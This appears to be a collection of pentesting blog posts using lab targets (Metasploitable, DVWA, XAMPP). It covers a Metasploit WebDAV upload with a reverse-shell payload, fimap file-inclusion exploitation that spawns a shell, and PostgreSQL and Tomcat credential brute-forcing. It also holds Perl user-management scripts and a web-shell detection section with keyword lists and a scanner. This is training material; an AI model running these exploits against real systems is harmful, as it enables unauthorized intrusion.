Exploit XMAPP With Metasploit Framework

XMAPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

XAMPP For Windows

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf >use exploit(xampp_webdav_upload_php)

msf>set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

Xampp Exploit

We’re home.

Source:

• metasploit.com – http://www.metasploit.com/modules/exploit/windows/http/xampp_webdav_upload_php
• Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Main_Page
• XAMPP For Windows – http://www.apachefriends.org/en/xampp-windows.html

How To Completely Remove User Account In Unix (Linux)

How do I remove a user’s access from my server? How do I delete a user account under Linux operating systems?

You need to use the userdel command to delete a user account and related files from user account or use this perl script:

/#!/usr/bin/perl
use strict;
use warnings;
use Fcntl ':flock'; # import LOCK_* constants

if ($#ARGV != 0) {
print STDERR "Usage is $0 <user>\n";
exit (8);
}

my $user = $ARGV[0];

sub edit_file($)
{
my $file = shift;

open IN_FILE, "<$file" or
die("Could not open $file for input");

open OUT_FILE, ">$file.new" or
die("Could not open $file.new for output");

while (1) {
my $line = <IN_FILE>;
if (not defined($line)) {
last;
}
if ($line =~ /^$user/) {
next;
}
print OUT_FILE $line;
}
close (IN_FILE);
close (OUT_FILE);
unlink("$file.bak");
rename("$file", "$file.bak");
rename("$file.new", $file);
}

my @info = getpwnam($user);
if (@info == -1) {
die("No such user $user");
}

open PW_FILE, "</etc/passwd" or
die("Could not read /etc/passwd");

# Lock the file for the duration of the program
flock PW_FILE, LOCK_EX;

edit_file("/etc/group");
edit_file("/etc/shadow");

if ($info[7] eq "/home/$user") {
system("rm -rf /home/$user");
} else {
print "User has a non-standard home directory.\n";
print "Please remove manually.\n";
print "Directory = $info[7]\n";
}
print "User $user -- Deleted\n";

edit_file("/etc/passwd");

flock(PW_FILE,LOCK_UN);
close(PW_FILE);</p>

This script  must be run as root user.

Running the script

root@bt:~/src/perl# ./del_user_a.pl
Usage is ./del_user_a.pl <user>
root@bt:~/src/perl# ./del_user_a.pl wysocand

Running On BackTrack 5R2

 

Source:

• Userdel -http://linux.die.net/man/8/userdel
• Userdel – http://linuxers.org/howto/how-add-remove-user-accounts-linux
• Perl for System Administration – http://www.unix.org.ua/orelly/perl/sysadmin/index.htm

How To Automatically Create User Accounts in Unix ( Linux )

The simplest way to automatically  add a new user to your system is to do run a Perl script  like this:

#!/usr/bin/perl
 use strict;
 use warnings;
 use Fcntl ':flock'; # import LOCK_* constants

# The file we are going to change (Testing on Back Track 5R2)

my $pw_file = "/etc/passwd";
 my $group_file = "/etc/group";
 my $shadow_file = "/etc/shadow";

# Login name
 my $login;    # Login name
 print "Login: ";
 $login = <STDIN>;
 chomp($login);

if ($login !~ /[A-Z_a-z0-9]+/) {
 die("No login specified");
 }

open PW_FILE, "<$pw_file" or die("Could not read $pw_file");
 # Lock the file for the duration of the program
 flock PW_FILE, LOCK_EX;

# Check login info.
 my $check_uid = getpwnam($login);
 if (defined($check_uid)) {
 print "$login already exists\n";
 exit (8);
 }

# Find the highest UID.  We'll be that +1
 my @pw_info = <PW_FILE>;

my $uid = 0;    # UID for the user

# Find biggest user
 foreach my $cur_pw (@pw_info) {
 my @fields = split /:/, $cur_pw;
 if ($fields[2] > 60000) {
 next;
 }
 if ($fields[2] > $uid) {
 $uid = $fields[2];
 }
 }
 $uid++;

# Each user get his own group.
 my $gid = $uid;

# Default home dir.
 my $home_dir = "/home/$login";

print "Full Name: "; # Get user full name
 my $full_name = <STDIN>;
 chomp($full_name);

my $shell = "";    # Get user shell to use
 while (! -f $shell) {
 print "Shell: ";
 $shell = <STDIN>;
 chomp($shell);
 }

print "Setting up account for: $login [$full_name]\n";

open PW_FILE, ">>$pw_file" or
 die("Could not append to $pw_file");
 print PW_FILE
 "${login}:x:${uid}:${gid}:${full_name}:${home_dir}:$shell\n";

open GROUP_FILE, ">>$group_file" or
 die("Could not append to $group_file");
 print GROUP_FILE "${login}:x:${gid}:$login\n";
 close GROUP_FILE;

open SHADOW, ">>$shadow_file" or
 die("Could not append to $shadow_file");
 print SHADOW "${login}:*:11647:0:99999:7:::\n";
 close SHADOW;

# Create the home directory
 mkdir($home_dir);
 chmod(0755, $home_dir);
 system("cp -R /etc/skel/.[a-zA-Z]* $home_dir");
 system("find $home_dir -print ".
 "-exec chown ${login}:${login} {} \\;");

# Set the password for the user
 print "Setting password\n";
 system("passwd $login");

flock(PW_FILE,LOCK_UN);
 close(PW_FILE);

How It Work:

• Lock the /etc/passwd file
• Get the user name
• Lock the password file
• Make sure the user doesn’t exist
• Genarate a user ID for the new user
• Create an entry in /etc/passwd
• Create an entry in /etc/shadow
• Create an entry in /etc/groups
• Create the user home directory
• Set the initial password for new user
• Unlock the /etc/passwd file

Example on BackTrack Linux:

Add New User

And:

Add New User

 

Source:

1.Perl for System Administration.http://docstore.mik.ua/orelly/perl/sysadmin/index.htm

 

Perl – OnLine Library

1. HTMLified Perl 5 Reference Guide – http://www.oopweb.com/Perl/Documents/Perl5Ref/VolumeFrames.html
2. Perl 5 Documentation – http://www.oopweb.com/Perl/Documents/PerlDoc/VolumeFrames.html
3. Perl for Perl Newbies – http://www.oopweb.com/Perl/Documents/P4PNewbies/VolumeFrames.html
4. Perl for Win32 FAQ – http://www.oopweb.com/Perl/Documents/PerlWin32/VolumeFrames.html
5. Beginning Perl – http://www.perl.org/books/beginning-perl/
6. Impatient Perl – http://www.perl.org/books/impatient-perl/
7. Extreme Perl – http://www.extremeperl.org/bk/home
8. MacPerl: Power & Ease – http://macperl.com/ptf_book/r/MP/i2.html
9. Embedding Perl in HTML with Mason – http://www.masonbook.com
10. Perl for the Web – http://www.globalspin.com/thebook/
11. Web Client Programming with Perl – http://www.oreilly.com/openbook/webclient/
12. Perl 5 By Example – http://www.computer-books.us/perl_0010.php
13. An Introduction to Perl – http://www.linuxtopia.org/Perl_Tutorial/index.html
14. Beginning CGI Programming with Perl – http://www.learnthat.com/internet/learn-160-cgi_programming_perl.htm
15. Perl Tutorial: Start – http://www.comp.leeds.ac.uk/Perl/start.html
16. A Perl Tutorial – http://www.civeng.carleton.ca/Courses/Grad/1995-96/82.562/perl/
17. Robert’s Perl Tutorial – http://www.sthomas.net/oldpages/roberts-perl-tutorial.htm
18. Beginning Perl Tutorials – http://www.pageresource.com/cgirec/index2.htm
19. Beginner’s Guide to CGI Scripting with Perl – http://www.lies.com/begperl/
20. Practical Perl Programming – http://www.cs.cf.ac.uk/Dave/PERL/
21. Perl 5 Unleashed – http://octopus.cdut.edu.cn/~yf17/perl5/
22. Perl for System Administration – http://www.unix.org.ua/orelly/perl/sysadmin/index.htm
23. PERL — Practical Extraction and Report Language – http://www-cgi.cs.cmu.edu/cgi-bin/perl-man
24. Programming Perl – http://www.unix.org.ua/orelly/perl/prog3/
25. Steve Litt’s Perls of Wisdom – http://www.troubleshooters.com/codecorn/littperl/index.htm
26. Perl Regular Expression Tutorial – http://virtual.park.uga.edu/humcomp/perl/regex2a.html
27. Perl Documentation – http://www.perl.com/pub/q/documentation
28. Programming Perl 5 – http://www.squirrel.nl/pub/perlref-5.004.1.pdf
29. Beginner’s Introduction to Perl – http://www.perl.com/pub/a/2000/10/begperl1.html
30. Perl in a Nutshell – http://www.unix.org.ua/orelly/perl/perlnut/index.htm
31. Programming Perl, 3rd Edition – http://www.unix.org.ua/orelly/perl/prog3/index.htm
32. Advanced Perl Programming – http://www.unix.org.ua/orelly/perl/advprog/index.htm
33. Perl Cookbook – http://www.unix.org.ua/orelly/perl/cookbook/index.htm
34. XML processing with Perl – http://www.xmltwig.com/tutorial/perl_xml/mtb04_01.html

FIMAP – LFI/RFI Auditing Tool.

FIMAP:

Fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.

The goal of fimap is to improve the quality and security of your website.

Do not use this tool on servers where you don’t have permission to pentest!

Fimap is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.

How to use:

fimap.py [Options]

[Options]

• 
  -h – Help
• 
  -u [URL] – URL to scan
• 
  -m – Mass scan
• 
  -l [filename] – List of URLs for mass scan
• 
  -g – Perform Google search to find URLs
• 
  -q – Google search query
• 
  -H – Harvests a URL recursively for additional URLs to scan
• 
  -w [filename] – Write URL list for mass scan
• 
  -b – Enables blind testing where errors are not reported by the web application
• 
  -x – Exploit vulnerabilities

Output:
Scans target URL(s) for RFI/LFI bugs and, optionally, allows you to exploit any discovered vulnerabilities.

Mutillidae Web App -Metasploitable 2 LFI/RFI Auditing

Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulns and hints to help the user; providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiast, classrooms, labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an „assess the assessor” target for vulnerability assessment software.

c:\Python25\fimap_alpha_v09>python fimap.py -u "http://192.168.235.129/mutillidae/index.php?page=user-info.php"

c:\Python25\fimap_alpha_v09>python fimap.py -u „http://192.168.235.129/mutillidae/index.php?page=user-info.php”
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: ‚http://192.168.235.129/mutillidae/index.php?page=use
r-info.php’
[16:05:56] [OUT] Inspecting URL ‚http://192.168.235.129/mutillidae/index.php?pag
e=user-info.php’…
[16:05:56] [INFO] Fiddling around with URL…
[16:05:56] [OUT] [PHP] Possible file inclusion found! -> ‚http://192.168.235.129
/mutillidae/index.php?page=FmQXBJP2’ with Parameter ‚page’.
[16:05:56] [OUT] [PHP] Identifying Vulnerability ‚http://192.168.235.129/mutilli
dae/index.php?page=user-info.php’ with Parameter ‚page’…
[16:05:56] [INFO] Scriptpath received: ‚/var/www/mutillidae’
[16:05:56] [INFO] Operating System is ‚Unix-Like’.
[16:05:56] [INFO] Testing file ‚/etc/passwd’…
[16:05:57] [INFO] Testing file ‚/proc/self/environ’…
[16:05:57] [INFO] Testing file ‚php://input’…
[16:05:57] [INFO] Testing file ‚/var/log/apache2/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/apache/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/httpd/access.log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache2/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/httpd/access_log’…
[16:05:58] [INFO] Testing file ‚http://www.phpbb.de/index.php’…
###########################################################
#[1] Possible PHP-File Inclusion
#
###########################################################
#::REQUEST
#  [URL]        http://192.168.235.129/mutillidae/index.php?page=user-info.php
#  [HEAD SENT]
#::VULN INFO
#  [GET PARAM]  page
#  [PATH]       /var/www/mutillidae
#  [OS]         Unix
#  [TYPE]       Absolute Clean
#  [TRUNCATION] No Need. It’s clean.
#  [READABLE FILES]
#                   [0] /etc/passwd
#                   [1] /proc/self/environ
########################################################################

This information can be used to further exploit the vulnerable system either manually or with another tool. On the other hand,we can also use fimap’s internal attack features by adding a “-x” parameter to the command line.

c:\Python25\fimap_alpha_v09>python fimap.py -x

c:\Python25\fimap_alpha_v09>python fimap.py -x
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###################################################
#:: List of Domains ::                            #
###################################################
#[1] 192.168.235.129                              #
#[ ] And 0 hosts with no valid attack vectors.    #
#[q] Quit                                         #
#######################################################
Choose Domain: 1
#######################################################
#:: FI Bugs on ‚192.168.235.129’ ::
#
######################################################
#[1] URL: ‚/mutillidae/index.php?page=user-info.php’ injecting file: ‚/proc/self
/environ’ using GET-param: ‚page’    #
#[q] Quit

#####################################################
Choose vulnerable script: 1
[16:17:49] [INFO] Testing PHP-code injection thru User-Agent…
[16:17:49] [OUT] PHP Injection works! Testing if execution works…
[16:17:49] [INFO] Testing execution thru ‚popen[b64]’…
[16:17:49] [OUT] Execution thru ‚popen[b64]’ works!
####################################################
#:: Available Attacks – PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey’s reverse shell           #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait – Setting up shell (one request)…
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands! 😉
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter ‚q’ to exit the shell.
——————————————-
fishell@www-data:/var/www/mutillidae$> who

We can see:

Fimap at work

Metasploitable 2 – DVWA – Damn Vulnerable Web App

Metasploitable 2 – DVWA – Damn Vulnerable Web App

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Security environment:

security environment

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

PHP

In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive, and if enabled it allows filesystem functions to use a URL which allows them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability, all user input needs to be validated before being used.

More info

• http://en.wikipedia.org/wiki/Remote_File_Inclusion
• http://www.owasp.org/index.php/Top_10_2007-A3

DVWA -Vulnerability: File Inclusion

To include a file edit the ?page=index.php in the URL to determine which file is included.

Remote file inclusion

 

Hacking Windows 7 Password Without Any Software

Hacking Windows 7 Password Without Any Software

Attacking PostgreSQL On Metasplitable 2

Attacking PostgreSQL On Metasplitable 2

In this article we will see how we can attack a system that contains a PostgreSQL database.

Lets say that we have perform a port scan on a server and we have identify that is running a PostgreSQL database at port 5432.

Scanning with nmap:

nmap -sV 192.168.235.129

nmap -sV 192.168.235.129

We will open the metasploit framework and we will looking „postgresql”:

msf > search postgresql

Matching Modules
================

Name                                         Disclosure Date  Rank       Description
—-                                         —————  —-       ———–
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS 192.168.235.129

and

msf  auxiliary(postgres_login) > exploit

[*] 192.168.235.129:5432 Postgres – [01/21] – Trying username:’postgres’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚postgres’:”
[-] 192.168.235.129:5432 Postgres – [01/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [02/21] – Trying username:” with password:” on database ‚template1′
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ”:”
[-] 192.168.235.129:5432 Postgres – [02/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [03/21] – Trying username:’scott’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚scott’:”
[-] 192.168.235.129:5432 Postgres – [03/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [04/21] – Trying username:’admin’ with password:” on database ‚template1’

……………………………………………………………………………………………………………………………………….

This scanner is already configured to use the default wordlists about postgreSQL databases of metasploit framework so we will use them in this case:

 USERPASS_FILE     C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt 

no File containing (space-seperated) users and passwords, one pair per line

USER_FILE         C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt     

no File containing users, one per line

Waiting,waiting and:

Success

We have user name – „postgres” ,and password – „postgres”

Now we can login as posgres user:

Source:

1.Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Modules

2.PostgreSQL Login Utility – http://www.metasploit.com/modules/auxiliary/scanner/postgres/postgres_login

How to find backdoor PHP shell scripts on a server

How to find backdoor PHP shell scripts on a server

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need to use PHP commands that most legitimate scripts don’t, so you can search the files in your site for those commands. There are search utility programs you can use for finding text in files:

• passthru
• shell_exec
• system
• phpinfo
• base64_decode
• edoced_46esab
• chmod
• mkdir
• „ (backticks with an operating system command between them)
• fopen
• fclose
• readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/

Or

grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script ( source )

#!/usr/bin/perl -w
#usage: ./findshell.pl <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;
my $sens = <a href="http://perldoc.perl.org/functions/shift.html">shift</a>  || 10;
my $folder = <a href="http://perldoc.perl.org/functions/shift.html">shift</a> || './';
find(\&backdoor, "$folder");
sub backdoor {
    if ((/\.(php|txt)/)){
       <a href="http://perldoc.perl.org/functions/open.html">open</a> (my $IN,"<$_") || <a href="http://perldoc.perl.org/functions/die.html">die</a> "can not open datei $File::Find::name: $!";
       my @file =  <$IN>;
       #maybe evil stuffs
       my $score = <a href="http://perldoc.perl.org/functions/grep.html">grep</a> (/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid  \(|fileperms\(/i,@file);
       #probably evil stuffs
       my $tempscore = <a href="http://perldoc.perl.org/functions/grep.html">grep</a>(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
       $score +=  50 *  $tempscore;
       <a href="http://perldoc.perl.org/functions/print.html">print</a> "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
       <a href="http://perldoc.perl.org/functions/close.html">close</a> $IN;
  }elsif((/\.(jpg|jpeg|gif|png|tar|zip|gz|rar|pdf)/)){
       <a href="http://perldoc.perl.org/functions/open.html">open</a> (my $IN,"<$_") || (<a href="http://perldoc.perl.org/functions/print.html">print</a> "can not open datei $File::Find::name: $!" && next);
       <a href="http://perldoc.perl.org/functions/print.html">print</a> "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if <a href="http://perldoc.perl.org/functions/grep.html">grep</a> /(\<\?php|include(\ |\())/i, <$IN>;
       <a href="http://perldoc.perl.org/functions/close.html">close</a> $IN;
  }
}

Source:

Web Shell Detection Using NeoPI

Metasploitable 2 – Apache Tomcat Exploitation

Metasploitable 2 – Apache Tomcat Exploitation

In this post we will focus on the Apache Tomcat Web server and how we can discover the administrator’s credentials in order to gain access to the remote system – Metasploitable 2.

So we are performing our internal penetration testing and we have discovered the Apache Tomcat running on a remot system metasploitable linux 2 on port 8180.

nmap scan

Our next step will be to start metasploit framework and to search „tomcat”

msf> search tomcat

We have found an auxiliary scanner which will be the tool for our attempt to login to the Tomcat Application Manager.

tomcat

So we run the scanner and we are waiting to see if it will discover any valid credentials:

run exploit

We see User – tomcat , password – tomcat

Tomcat

Source:

• https://community.rapid7.com/docs/DOC-1875#comment-3171
• http://www.metasploit.com/modules/auxiliary/scanner/http/tomcat_mgr_login
• http://www.exploit-db.com/